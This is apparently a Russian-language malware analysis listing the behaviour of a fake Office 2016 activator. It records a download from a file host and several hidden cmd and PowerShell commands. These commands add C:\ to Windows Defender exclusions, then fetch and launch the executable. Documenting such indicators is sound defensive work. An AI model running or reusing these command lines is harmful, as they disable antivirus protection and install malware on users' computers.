Техническая информация
- https://www.up##ad.ee/download/12274152/c814ce2952d717e686fc/activator.exe как %windir%\officeactivator.exe
- DNS ASK up##ad.ee
- '%WINDIR%\syswow64\cmd.exe' /k powershell.exe -Command Add-MpPreference -ExclusionPath 'C:\'' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /k powershell.exe -exec bypass -windo 1 -noexit -command iex(new-object net.webclient).DownloadFile('https://www.up##ad.ee/download/12274152/c814ce2952d717e686fc/Activator.exe','%WINDIR%\Office...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /k start %WINDIR%\OfficeActivator.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /k start Microsoft.Office.Standard.2016x64r.exe' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /k powershell.exe -Command Add-MpPreference -ExclusionPath 'C:\'
- '%WINDIR%\syswow64\cmd.exe' /k powershell.exe -exec bypass -windo 1 -noexit -command iex(new-object net.webclient).DownloadFile('https://www.up##ad.ee/download/12274152/c814ce2952d717e686fc/Activator.exe','%WINDIR%\Office...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command Add-MpPreference -ExclusionPath 'C:\'
- '%WINDIR%\syswow64\cmd.exe' /k start %WINDIR%\OfficeActivator.exe
- '%WINDIR%\syswow64\cmd.exe' /k start Microsoft.Office.Standard.2016x64r.exe